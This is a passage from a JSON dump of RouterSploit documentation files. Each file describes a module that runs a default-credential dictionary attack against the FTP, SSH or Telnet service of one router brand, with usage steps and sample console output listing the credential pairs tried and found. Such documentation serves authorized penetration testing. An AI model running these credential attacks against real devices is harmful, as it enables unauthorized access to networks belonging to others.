192.168.1.1\nrsf (IPFire Router Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/routers/juniper/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Juniper Router FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/juniper/ftp_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/juniper/ftp_default_creds\nrsf (Juniper Router Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Juniper Router Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/juniper/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Juniper Router SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/juniper/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/juniper/ssh_default_creds\nrsf (Juniper Router Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Juniper Router Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/juniper/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Juniper Router Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/juniper/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/juniper/telnet_default_creds\nrsf (Juniper Router Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Juniper Router Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/routers/linksys/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Linksys Router FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/linksys/ftp_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/linksys/ftp_default_creds\nrsf (Linksys Router Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Linksys Router Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/linksys/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Linksys Router SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/linksys/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/linksys/ssh_default_creds\nrsf (Linksys Router Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Linksys Router Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/linksys/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Linksys Router Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/linksys/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/linksys/telnet_default_creds\nrsf (Linksys Router Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Linksys Router Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/routers/mikrotik/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Mikrotik Router FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/mikrotik/ftp_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/mikrotik/ftp_default_creds\nrsf (Mikrotik Router Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Mikrotik Router Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/mikrotik/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Mikrotik Router SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/mikrotik/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/mikrotik/ssh_default_creds\nrsf (Mikrotik Router Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Mikrotik Router Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/mikrotik/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Mikrotik Router Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/mikrotik/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/mikrotik/telnet_default_creds\nrsf (Mikrotik Router Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Mikrotik Router Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/routers/movistar/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Movistar Router FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/movistar/ftp_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/movistar/ftp_default_creds\nrsf (Movistar Router Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Movistar Router Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/movistar/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Movistar Router SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/movistar/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/movistar/ssh_default_creds\nrsf (Movistar Router Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Movistar Router Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/movistar/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Movistar Router Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/movistar/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/movistar/telnet_default_creds\nrsf (Movistar Router Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Movistar Router Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/routers/netcore/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Netcore Router FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/netcore/ftp_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/netcore/ftp_default_creds\nrsf (Netcore Router Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Netcore Router Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/netcore/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Netcore Router SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/netcore/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/netcore/ssh_default_creds\nrsf (Netcore Router Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Netcore Router Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/netcore/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Netcore Router Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/netcore/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/netcore/telnet_default_creds\nrsf (Netcore Router Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Netcore Router Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/routers/netgear/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Netgear Router FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/netgear/ftp_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/netgear/ftp_default_creds\nrsf (Netgear Router Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Netgear Router Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/netgear/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Netgear Router SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/netgear/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/netgear/ssh_default_creds\nrsf (Netgear Router Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Netgear Router Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/netgear/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Netgear Router Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/netgear/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/netgear/telnet_default_creds\nrsf (Netgear Router Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Netgear Router Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/routers/netsys/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Netsys Router FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/netsys/ftp_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/netsys/ftp_default_creds\nrsf (Netsys Router Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Netsys Router Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/netsys/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Netsys Router SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/netsys/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/netsys/ssh_default_creds\nrsf (Netsys Router Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Netsys Router Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/netsys/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Netsys Router Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/netsys/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/netsys/telnet_default_creds\nrsf (Netsys Router Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Netsys Router Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/routers/pfsense/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against PFSense Router FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/pfsense/ftp_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/pfsense/ftp_default_creds\nrsf (PFSense Router Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (PFSense Router Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/pfsense/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against PFSense Router SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/pfsense/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/pfsense/ssh_default_creds\nrsf (PFSense Router Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (PFSense Router Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": 